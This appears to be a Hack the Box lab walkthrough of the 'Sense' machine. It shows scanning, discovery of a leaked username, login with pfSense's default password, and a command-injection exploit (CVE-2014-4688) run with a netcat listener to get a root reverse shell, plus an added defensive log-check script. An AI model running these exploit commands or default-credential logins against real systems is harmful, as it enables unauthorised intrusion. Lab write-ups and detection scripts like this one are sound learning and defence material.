Hack the Box - Sense Walkthrough

This blog is related to computer security and ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activities. The blog is for informational and educational purposes and for those willing to learn about ethical hacking and penetration testing.

You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.

Hello Everyone!

Today we are going to look at the steps I followed to get root on Sense, a vulnerable machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.

Scanning and Enumeration

I kicked off my analysis by conducting a comprehensive scan of the target system using nmap default scripts:

# Basic Nmap Scan
sudo nmap -sSVC $TGT

Host is up (0.087s latency).
Not shown: 998 filtered tcp ports (no-response)
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35

The nmap results plus a manual inspection showed the presence of pfSense on ports 80 and 443, as well as lighttpd version 1.4.35 on the same ports.

I checked for the pfSense default username/password combination plus some other default combinations, but none of them worked.

To explore potential vulnerabilities, I used searchsploit for both pfSense and lighttpd:

searchsploit pfsense | grep -v Cros
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
pfSense - (Authenticated) Group Member Remote Command Execut | unix/remote/43193.rb
pfSense 2.1 build 20130911-1816 - Directory Traversal        | php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities                       | php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal                          | php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution                          | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection             | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injecti | php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities   | php/webapps/39709.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

searchsploit lighttpd
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC)                           | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Servic | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Exe | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Exe | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC)                    | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure          | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Se | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure     | multiple/remote/8786.txt
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Web Server Enumeration

Next, I initiated an ffuf scan to uncover hidden directories on the target web server:

ffuf -w $wordlist -u https://$TGT/FUZZ -e "/,.php,.txt" --replay-proxy

The ffuf scan revealed a file named /system-users.txt through directory browsing. After inspecting its contents, I discovered the following information:

####Support ticket###
Please create the following user

username: Rohit
password: company defaults

Exploiting pfSense Vulnerability

Having this information, and knowing that pfSense's default password is "pfsense", I connected to the pfSense system using the credentials:

# Connecting with pfSense
user: rohit
password: pfsense

Upon successful connection, I identified the pfSense version as:

2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16

Now that I had a set of valid credentials, I went back to the searchsploit results and revisited the "pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection" vulnerability and its corresponding exploit: https://www.exploit-db.com/exploits/43560

head 43560.py 

#!/usr/bin/env python3

# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688

Exploitation and Root Access

The script exploited the vulnerability 'pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.' After setting up a listener, the script was executed to gain root access:

# Start Listener
nc -nlvp 7777

# Run Exploit
python /home/htb-ragab0t/43560.py --rhost $TGT --lhost $LHOST --lport 7777 --username rohit --password pfsense

The successful execution of the exploit granted root access to the target system:

# Confirming Root Access
# Checking User ID
uid=0(root) gid=0(wheel) groups=0(wheel)
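
An added example, not part of the original walkthrough or the exploit author's code: a log check a defender could run to spot shell metacharacters in parameters sent to status_rrd_graph_img.php, including percent-encoded and double-encoded ones. The log layout, the `database` and `graph` parameter names in the samples, and all sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: each log line holds a client address, a quoted request line
# ("GET /path?query HTTP/1.1") and a status code, as in common/combined formats.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCRIPT = "/status_rrd_graph_img.php"
# Characters that let a parameter value break out of a shell command line.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253B is seen as ';'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client, status, parameter, decoded value) for each flagged parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not fully_decode(url.path).endswith(SCRIPT):
            continue
        # Split on '&' by hand: a literal ';' must stay inside the value.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            value = fully_decode(raw.replace("+", " "))
            if SHELL_META.search(value):
                hits.append((m["client"], int(m["status"]), name, value))
    return hits

# Constructed sample lines (documentation addresses, invented values).
SAMPLE_LOG = [
    '192.0.2.10 fw - [01/Jan/2024:10:00:00 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd&graph=eight_hour HTTP/1.1" 200 5120',
    '198.51.100.7 fw - [01/Jan/2024:10:05:00 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd%3Bid HTTP/1.1" 200 0',
    '198.51.100.7 fw - [01/Jan/2024:10:05:02 +0000] "GET /status_rrd_graph_img.php?database=x%257Cid HTTP/1.1" 200 0',
    '192.0.2.10 fw - [01/Jan/2024:10:06:00 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The searchsploit entry above lists the issue for pfSense < 2.1.4, so this check is for spotting attempts against installs that have not yet been upgraded past that version.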

And that's it for now. Until next time :)

